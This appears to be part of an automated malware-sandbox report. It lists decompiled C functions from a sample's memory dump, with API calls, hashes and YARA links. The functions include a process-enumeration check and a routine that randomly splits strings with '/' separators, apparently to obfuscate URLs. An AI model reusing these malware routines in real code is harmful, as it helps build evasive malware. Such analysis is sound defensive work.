                                • Opcode ID: 5313c4625e3427cfdc57ee9e0825ed627789c9c1d8749b044e0729c8dd4d0b30
                                • Instruction ID: ef46c24b45a40d7336afc1325f35111a14c244476c9b82272191042616452f6e
                                • Opcode Fuzzy Hash: 5313c4625e3427cfdc57ee9e0825ed627789c9c1d8749b044e0729c8dd4d0b30
                                • Instruction Fuzzy Hash: 5721E432620312EBDF216E69DCC4B577BE9EF48B54F050664FD21AB282DB75FC408680
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04193032, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                Download Yara Rule
                                C-Code - Quality: 39%
                                			E04193032(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E04196710(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E041915B9(_t23);
						}
					}
					return _t38;
				}
				if(E04194C8C(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x419a2f8, 1, 0,  *0x419a394);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E04194039(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E04191D57(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E04193C84(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E041973C3( &_v32, _t39);
					goto L13;
				}
			}












                                0x04193032
                                0x0419303f
                                0x04193045
                                0x04193046
                                0x04193047
                                0x04193048
                                0x04193049
                                0x0419304d
                                0x04193059
                                0x0419305d
                                0x041930e5
                                0x041930e5
                                0x041930e8
                                0x041930ea
                                0x041930f2
                                0x041930f8
                                0x041930fb
                                0x041930fb
                                0x041930f8
                                0x04193106
                                0x04193106
                                0x04193070
                                0x04193072
                                0x04193072
                                0x04193089
                                0x0419308d
                                0x04193090
                                0x0419309b
                                0x041930a2
                                0x041930a2
                                0x041930ae
                                0x041930af
                                0x041930bd
                                0x041930b1
                                0x041930b1
                                0x041930b2
                                0x041930b3
                                0x041930b4
                                0x041930b5
                                0x041930b6
                                0x041930b6
                                0x041930c2
                                0x041930c7
                                0x041930c9
                                0x041930cb
                                0x041930cb
                                0x041930d2
                                0x00000000
                                0x041930d4
                                0x041930d4
                                0x041930e1
                                0x00000000
                                0x041930e1

                                APIs
                                • CreateEventA.KERNEL32(0419A2F8,00000001,00000000,00000040,?,?,7519F710,00000000,7519F730,?,?,?,?,0419211B,?,00000001), ref: 04193083
                                • SetEvent.KERNEL32(00000000,?,?,?,?,0419211B,?,00000001,0419560C,00000002,?,?,0419560C), ref: 04193090
                                • Sleep.KERNEL32(00000BB8,?,?,?,?,0419211B,?,00000001,0419560C,00000002,?,?,0419560C), ref: 0419309B
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,0419211B,?,00000001,0419560C,00000002,?,?,0419560C), ref: 041930A2
                                  • Part of subcall function 04194039: WaitForSingleObject.KERNEL32(00000000,?,?,?,041930C2,?,041930C2,?,?,?,?,?,041930C2,?), ref: 04194113
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                • String ID:
                                • API String ID: 2559942907-0
                                • Opcode ID: e541cf89ac4a568ba8888ff684c9d6f531aff7f7422a206425b943f802802316
                                • Instruction ID: 2740a7c19966676e75ce11e50a0d1a8c8e4b32bade9f4353b43401fa2c9e8cc2
                                • Opcode Fuzzy Hash: e541cf89ac4a568ba8888ff684c9d6f531aff7f7422a206425b943f802802316
                                • Instruction Fuzzy Hash: FA215372E00219BBDF20AFE588C59EEB7EDAF48354B094469ED21A7100DB35FD458BA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04194D09, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 78%
                                			E04194D09(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E04196837(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                0x04194d15
                                0x04194d19
                                0x04194d1a
                                0x04194d1b
                                0x04194d1d
                                0x04194d1f
                                0x04194d24
                                0x04194d27
                                0x04194dbe
                                0x04194dc5
                                0x04194dc5
                                0x04194d30
                                0x04194d37
                                0x04194d47
                                0x04194d47
                                0x04194d4d
                                0x04194d4f
                                0x04194d54
                                0x04194d5d
                                0x04194d65
                                0x04194d68
                                0x04194d73
                                0x04194d77
                                0x04194d79
                                0x04194d7a
                                0x04194d83
                                0x04194d87
                                0x04194d98
                                0x04194d89
                                0x04194d8e
                                0x04194d93
                                0x04194da2
                                0x04194da2
                                0x04194d77
                                0x04194da8
                                0x04194dae
                                0x04194dae
                                0x04194db7
                                0x04194dbc
                                0x04194dbc
                                0x00000000

                                APIs
                                • Sleep.KERNEL32(000000C8), ref: 04194D37
                                • lstrlenW.KERNEL32(?), ref: 04194D6D
                                • memcpy.NTDLL(00000000,?,00000000,00000000), ref: 04194D8E
                                • SysFreeString.OLEAUT32(?), ref: 04194DA2
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: FreeSleepStringlstrlenmemcpy
                                • String ID:
                                • API String ID: 1198164300-0
                                • Opcode ID: cba14ff85587aa323085ea6bce318150038ff612ae67b3242b065455ba9286c9
                                • Instruction ID: ce52762bbb634d9577a5823dd108c7b813c8939a4c23351c5442a7ee2540c0e1
                                • Opcode Fuzzy Hash: cba14ff85587aa323085ea6bce318150038ff612ae67b3242b065455ba9286c9
                                • Instruction Fuzzy Hash: 73212A79A01219FFDF10DFA8C88499EBBF9FF58305B1441A9E905E7210EB31AE41CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 041952E5, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 68%
                                			E041952E5(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x419a290, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x419a2a8; // 0x0
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x419a2a8 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                0x041952ed
                                0x041952f0
                                0x041952f6
                                0x0419530e
                                0x04195312
                                0x04195315
                                0x04195317
                                0x0419531a
                                0x0419531c
                                0x0419531f
                                0x04195321
                                0x04195321
                                0x04195323
                                0x0419532e
                                0x04195333
                                0x04195344
                                0x0419534c
                                0x04195351
                                0x04195354
                                0x04195357
                                0x04195359
                                0x0419535f
                                0x04195362
                                0x04195362
                                0x04195362
                                0x0419536d
                                0x04195372
                                0x0419537c

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,041962E0,00000000,?,00000000,041970D9,00000000,00000000), ref: 041952F0
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04195308
                                • memcpy.NTDLL(00000000,00000000,-00000008,?,?,?,041962E0,00000000,?,00000000,041970D9,00000000,00000000), ref: 0419534C
                                • memcpy.NTDLL(00000001,00000000,00000001,041970D9,00000000,00000000), ref: 0419536D
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpy$AllocateHeaplstrlen
                                • String ID:
                                • API String ID: 1819133394-0
                                • Opcode ID: be93647d8b110113c80b559543456aafc7bb5bbddb1484a411c9b3d80eeb79e4
                                • Instruction ID: 7e568ec99f6dc8c27ca2398cce778ce96aab1983a1540c1019b7ba5ebc2b35d1
                                • Opcode Fuzzy Hash: be93647d8b110113c80b559543456aafc7bb5bbddb1484a411c9b3d80eeb79e4
                                • Instruction Fuzzy Hash: 691106B2A00114BFDB158B6ADCC4E9EBBFEEB81390B450266F40497250EB74AE44C7A0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0419513E, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                Download Yara Rule
                                C-Code - Quality: 68%
                                			E0419513E() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x419a2d4; // 0x0
						_t2 = _t9 + 0x419bdd4; // 0x3207eb62
						_push( &_v264);
						if( *0x419a118() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                0x04195149
                                0x04195153
                                0x04195157
                                0x04195161
                                0x04195192
                                0x04195168
                                0x0419516d
                                0x0419517a
                                0x04195183
                                0x0419519a
                                0x04195185
                                0x0419518d
                                0x00000000
                                0x0419518d
                                0x0419519b
                                0x0419519c
                                0x00000000
                                0x0419519c
                                0x00000000
                                0x04195196
                                0x041951a2
                                0x041951a7

                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0419514E
                                • Process32First.KERNEL32(00000000,?), ref: 04195161
                                • Process32Next.KERNEL32(00000000,?), ref: 0419518D
                                • CloseHandle.KERNEL32(00000000), ref: 0419519C
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: 1b87e3d3a0446d6186f166524a028ccca14c519bc091392419037760f7769f70
                                • Instruction ID: 7405199bfab87f79f93569b45d5152812a6ed3e46cf847bba2f97521214acf93
                                • Opcode Fuzzy Hash: 1b87e3d3a0446d6186f166524a028ccca14c519bc091392419037760f7769f70
                                • Instruction Fuzzy Hash: 06F096732011247AEF22AA669C88DDB77EDDBC4358F040172E955E2000EB24AD8686A1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04195076, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04195076() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x419a2c4; // 0x350
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x419a308; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x419a2c4; // 0x350
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x419a290; // 0x63a0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                0x04195076
                                0x0419507d
                                0x041950c7
                                0x041950c9
                                0x041950c9
                                0x04195081
                                0x04195087
                                0x0419508c
                                0x04195090
                                0x04195096
                                0x0419509d
                                0x00000000
                                0x00000000
                                0x0419509f
                                0x041950a4
                                0x00000000
                                0x00000000
                                0x00000000
                                0x041950a4
                                0x041950a6
                                0x041950ae
                                0x041950b1
                                0x041950b1
                                0x041950b7
                                0x041950be
                                0x041950c1
                                0x041950c1
                                0x00000000

                                APIs
                                • SetEvent.KERNEL32(00000350,00000001,041956C9), ref: 04195081
                                • SleepEx.KERNEL32(00000064,00000001), ref: 04195090
                                • CloseHandle.KERNEL32(00000350), ref: 041950B1
                                • HeapDestroy.KERNEL32(063A0000), ref: 041950C1
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: CloseDestroyEventHandleHeapSleep
                                • String ID:
                                • API String ID: 4109453060-0
                                • Opcode ID: 2aaf96541bc6ee6c0113609c0da3912b2726d230e7a9e45392b37930499cc1b6
                                • Instruction ID: ad97305c7eef27e6e63bb2a9f1ff11d6d7ff69d4aada075e208018de44935ada
                                • Opcode Fuzzy Hash: 2aaf96541bc6ee6c0113609c0da3912b2726d230e7a9e45392b37930499cc1b6
                                • Instruction Fuzzy Hash: 98F01272B11311BBEE215E76D98CB5637EDEB04B91B0C0194FC14E7280DF29EC848990
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 041910DD, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 50%
                                			E041910DD(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x419a37c; // 0x0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x419a37c; // 0x0
					if( *((intOrPtr*)(_t6 + 0x58)) == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x419a030) {
					HeapFree( *0x419a290, 0, _t8);
				}
				_t14[1] = E0419578C(_v0);
				_t11 =  *0x419a37c; // 0x0
				_t12 = _t11 + 0x40;
				__imp__(_t12, _t14);
				return _t12;
			}










                                0x041910dd
                                0x041910dd
                                0x041910e6
                                0x041910f6
                                0x041910f6
                                0x04191100
                                0x00000000
                                0x00000000
                                0x041910f0
                                0x041910f0
                                0x04191102
                                0x04191106
                                0x04191118
                                0x04191118
                                0x04191128
                                0x0419112b
                                0x04191130
                                0x04191134
                                0x0419113a

                                APIs
                                • RtlEnterCriticalSection.NTDLL(-00000040), ref: 041910E6
                                • Sleep.KERNEL32(0000000A,?,?,041955D3,?,?,?,?,?,04196BD8,?,00000001), ref: 041910F0
                                • HeapFree.KERNEL32(00000000,?,?,?,041955D3,?,?,?,?,?,04196BD8,?,00000001), ref: 04191118
                                • RtlLeaveCriticalSection.NTDLL(-00000040), ref: 04191134
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID:
                                • API String ID: 58946197-0
                                • Opcode ID: 52dc82acaf19cdc1516abecacd81680af7978607a7ac92ed043f018f965f0e64
                                • Instruction ID: 7b2945ecccda5d8a09cd33164bb2f08502389c4a4c4e6c0f68417213bd04f363
                                • Opcode Fuzzy Hash: 52dc82acaf19cdc1516abecacd81680af7978607a7ac92ed043f018f965f0e64
                                • Instruction Fuzzy Hash: 12F0DAB1311281BBFB259F7ADA89A1A7BE8EF04780B088414F555D7351CB29ED84CB25
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 041950DF, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 37%
                                			E041950DF() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x419a37c; // 0x0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x419a37c; // 0x0
					if(_t5[0x16] == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x419a37c; // 0x0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x419b83e) {
					HeapFree( *0x419a290, 0, _t10);
					_t7 =  *0x419a37c; // 0x0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                0x041950df
                                0x041950e8
                                0x041950f8
                                0x041950f8
                                0x04195102
                                0x00000000
                                0x00000000
                                0x041950f2
                                0x041950f2
                                0x04195104
                                0x04195109
                                0x0419510d
                                0x04195120
                                0x04195126
                                0x04195126
                                0x0419512f
                                0x04195131
                                0x04195135
                                0x0419513b

                                APIs
                                • RtlEnterCriticalSection.NTDLL(-00000040), ref: 041950E8
                                • Sleep.KERNEL32(0000000A,?,?,041955D3,?,?,?,?,?,04196BD8,?,00000001), ref: 041950F2
                                • HeapFree.KERNEL32(00000000,?,?,?,041955D3,?,?,?,?,?,04196BD8,?,00000001), ref: 04195120
                                • RtlLeaveCriticalSection.NTDLL(-00000040), ref: 04195135
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID:
                                • API String ID: 58946197-0
                                • Opcode ID: 9f4020f8b6c87bbec25f4f686201c0be7572758abbf566a887aac08d271da773
                                • Instruction ID: 674f3c27549d3f8abf975daebd1f9efa97555638b8a085d4b8af9390cc66efad
                                • Opcode Fuzzy Hash: 9f4020f8b6c87bbec25f4f686201c0be7572758abbf566a887aac08d271da773
                                • Instruction Fuzzy Hash: D1F0DAB5210240EBEB199F26EA99A1537E5EF48781B084058E912A7350CB39AC84CA21
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04193D98, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 58%
                                			E04193D98(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E04196837(_t2);
				if(_t34 != 0) {
					_t30 = E04196837(_t28);
					if(_t30 == 0) {
						E041950CA(_t34);
					} else {
						_t39 = _a4;
						_t22 = E041977DD(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E041977DD(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                0x04193d98
                                0x04193da2
                                0x04193da4
                                0x04193daa
                                0x04193daa
                                0x04193db3
                                0x04193db7
                                0x04193dc3
                                0x04193dc7
                                0x04193e3b
                                0x04193dc9
                                0x04193dc9
                                0x04193dcd
                                0x04193dd4
                                0x04193dd7
                                0x04193df1
                                0x04193de0
                                0x04193de0
                                0x04193de4
                                0x04193de7
                                0x04193dec
                                0x04193dec
                                0x04193df6
                                0x04193e1e
                                0x04193e24
                                0x04193e27
                                0x04193df8
                                0x04193dfa
                                0x04193e02
                                0x04193e0d
                                0x04193e12
                                0x04193e12
                                0x04193e2e
                                0x04193e35
                                0x04193e36
                                0x04193e36
                                0x04193dc7
                                0x04193e46

                                APIs
                                • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,04193CEE,00000000,00000000,00000000,00000000,?,?,0419106E,?,00000000), ref: 04193DA4
                                  • Part of subcall function 04196837: RtlAllocateHeap.NTDLL(00000000,00000000,04194197), ref: 04196843
                                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04193CEE,00000000,00000000,00000000,00000000,?,?,0419106E), ref: 04193E02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 04193E12
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 04193E1E
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                • String ID:
                                • API String ID: 3767559652-0
                                • Opcode ID: 40a4cd3b6ebcbc910de0c86e2ad7a126b2aa5427ff726eeb05ee91ad37bbcdb6
                                • Instruction ID: ed89677c0d3a381112edfffd2de46ef444c3b249f5b3acbf792c1a294413f359
                                • Opcode Fuzzy Hash: 40a4cd3b6ebcbc910de0c86e2ad7a126b2aa5427ff726eeb05ee91ad37bbcdb6
                                • Instruction Fuzzy Hash: 4121A27260025AFBDF125F65C8D8AAB7FF9EF0A644B094055FC149B201E735ED41C7A0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04195D37, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04195D37(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E04196837(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                0x04195d4c
                                0x04195d50
                                0x04195d5a
                                0x04195d61
                                0x04195d64
                                0x04195d66
                                0x04195d6e
                                0x04195d73
                                0x04195d81
                                0x04195d86
                                0x04195d90

                                APIs
                                • lstrlenW.KERNEL32(2738C7B8,?,75145520,00000008,0419BD54,?,04191B37,2738C7B8,0419BD54,?,?,?,?,?,?,041920B0), ref: 04195D47
                                • lstrlenW.KERNEL32(04191B37,?,04191B37,2738C7B8,0419BD54,?,?,?,?,?,?,041920B0), ref: 04195D4E
                                  • Part of subcall function 04196837: RtlAllocateHeap.NTDLL(00000000,00000000,04194197), ref: 04196843
                                • memcpy.NTDLL(00000000,2738C7B8,751469A0,?,?,04191B37,2738C7B8,0419BD54,?,?,?,?,?,?,041920B0), ref: 04195D6E
                                • memcpy.NTDLL(751469A0,04191B37,00000002,00000000,2738C7B8,751469A0,?,?,04191B37,2738C7B8,0419BD54), ref: 04195D81
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: lstrlenmemcpy$AllocateHeap
                                • String ID:
                                • API String ID: 2411391700-0
                                • Opcode ID: ea9456628b9b2072bb252b385c314a907e64a94cb337b9af2a380d8b83e59583
                                • Instruction ID: 4894884ddf7213feceb1da6aea0868c0b03e7cb38037c4d9606a820e31b203a1
                                • Opcode Fuzzy Hash: ea9456628b9b2072bb252b385c314a907e64a94cb337b9af2a380d8b83e59583
                                • Instruction Fuzzy Hash: F8F0E776900118BB9F11EBA9CC84C9A7BECEF092987154166EA08D7211E735EE149BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 041921C1, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,04197100,00000000), ref: 041921D1
                                • lstrlen.KERNEL32(?), ref: 041921D9
                                  • Part of subcall function 04196837: RtlAllocateHeap.NTDLL(00000000,00000000,04194197), ref: 04196843
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 041921ED
                                • lstrcat.KERNEL32(00000000,?), ref: 041921F8
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp Download File
